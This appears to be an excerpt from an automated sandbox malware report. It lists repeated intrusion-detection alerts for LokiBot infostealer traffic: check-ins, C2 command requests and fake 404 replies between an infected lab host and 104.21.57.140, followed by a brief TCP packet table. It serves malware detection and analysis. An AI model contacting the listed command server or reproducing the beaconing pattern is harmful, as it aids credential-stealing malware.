2024-12-02T14:47:32.141392+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:32.141392+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:32.141392+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:33.456486+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:33.456486+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:33.576652+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49887	TCP
2024-12-02T14:47:33.859801+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:33.859801+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:33.859801+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:35.118441+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:35.118441+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:35.238941+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49891	TCP
2024-12-02T14:47:35.503758+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:35.503758+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:35.503758+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:36.700242+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:36.700242+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:36.820183+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49895	TCP
2024-12-02T14:47:37.095474+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:37.095474+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:37.095474+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:38.338383+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:38.338383+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:38.458368+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49900	TCP
2024-12-02T14:47:38.724665+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:38.724665+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:38.724665+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:40.145347+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:40.145347+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:40.265349+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49906	TCP
2024-12-02T14:47:40.543502+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:40.543502+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:40.543502+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:41.814075+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:41.814075+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:41.934270+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49909	TCP
2024-12-02T14:47:42.203055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:42.203055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:42.203055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:43.461307+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:43.461307+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:43.581302+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49914	TCP
2024-12-02T14:47:43.845851+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:43.845851+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:43.845851+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:45.081931+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:45.081931+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:45.246793+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49919	TCP
2024-12-02T14:47:45.764255+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:45.764255+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:45.764255+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:46.975329+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:46.975329+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:47.095295+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49925	TCP
2024-12-02T14:47:47.361857+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:47.361857+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:47.361857+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:48.602398+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:48.602398+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:48.729038+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49929	TCP
2024-12-02T14:47:49.059293+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:49.059293+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:49.059293+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:50.298537+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:50.298537+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:50.418563+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49933	TCP
2024-12-02T14:47:50.699604+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:50.699604+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:50.699604+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:51.921722+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:51.921722+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:52.041979+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49939	TCP
2024-12-02T14:47:52.320146+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:52.320146+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:52.320146+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:53.503954+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:53.503954+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:53.624049+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49943	TCP
2024-12-02T14:47:53.899018+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:53.899018+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:53.899018+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:55.072130+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:55.072130+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:55.192162+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49947	TCP
2024-12-02T14:47:55.453881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:55.453881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:55.453881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:56.671516+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:56.671516+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:56.838696+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49952	TCP
2024-12-02T14:47:57.187443+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:57.187443+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:57.187443+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:58.467226+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:58.467226+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:58.587191+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49956	TCP
2024-12-02T14:47:58.861617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:47:58.861617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:47:58.861617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:00.104466+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:00.104466+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:00.226501+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49961	TCP
2024-12-02T14:48:00.495169+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:00.495169+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:00.495169+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:01.769084+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:01.769084+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:01.889194+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49965	TCP
2024-12-02T14:48:02.161788+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:02.161788+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:02.161788+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:04.695776+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:04.695776+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:04.815767+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49971	TCP
2024-12-02T14:48:05.077723+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:05.077723+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:05.077723+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:06.371510+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:06.371510+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:06.491726+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49977	TCP
2024-12-02T14:48:06.749601+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:06.749601+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:06.749601+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:08.003250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:08.003250+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:08.123211+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49983	TCP
2024-12-02T14:48:08.405254+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:08.405254+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:08.405254+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:09.590513+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:09.590513+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:09.710511+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49988	TCP
2024-12-02T14:48:09.969317+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:09.969317+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:09.969317+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:11.277388+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:11.277388+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:11.397389+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49992	TCP
2024-12-02T14:48:11.655286+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:11.655286+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:11.655286+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:12.842611+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:12.842611+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:12.962661+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49995	TCP
2024-12-02T14:48:13.236851+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:13.236851+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:13.236851+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:14.454568+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:14.454568+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:14.589750+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50001	TCP
2024-12-02T14:48:14.998847+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:14.998847+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:14.998847+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:16.226342+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:16.226342+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:16.346268+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50004	TCP
2024-12-02T14:48:16.608052+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:16.608052+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:16.608052+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:17.869201+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:17.869201+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:17.991479+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50006	TCP
2024-12-02T14:48:18.296110+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:18.296110+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:18.296110+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:19.525064+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:19.525064+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:19.645003+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50012	TCP
2024-12-02T14:48:19.906175+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:19.906175+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:19.906175+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:21.192264+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:21.192264+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:21.312250+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50016	TCP
2024-12-02T14:48:21.667040+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:21.667040+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:21.667040+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:22.915780+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:22.915780+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:23.035716+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50021	TCP
2024-12-02T14:48:23.346752+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:23.346752+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:23.346752+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:24.582221+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:24.582221+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:24.703176+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50025	TCP
2024-12-02T14:48:24.985941+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:24.985941+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:24.985941+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:26.191428+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:26.191428+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:26.311419+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50031	TCP
2024-12-02T14:48:26.579169+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50034	104.21.57.140	80	TCP
2024-12-02T14:48:26.579169+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50034	104.21.57.140	80	TCP
2024-12-02T14:48:26.579169+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50034	104.21.57.140	80	TCP
2024-12-02T14:48:27.863216+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50034	104.21.57.140	80	TCP
2024-12-02T14:48:27.863216+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50034	104.21.57.140	80	TCP
2024-12-02T14:48:27.983460+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	50034	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 14:46:21.023961067 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:21.024014950 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:21.024084091 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:21.184186935 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:21.184221029 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:22.403484106 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:22.403589964 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:22.476923943 CET	49700	443	192.168.2.7	104.21.12.202
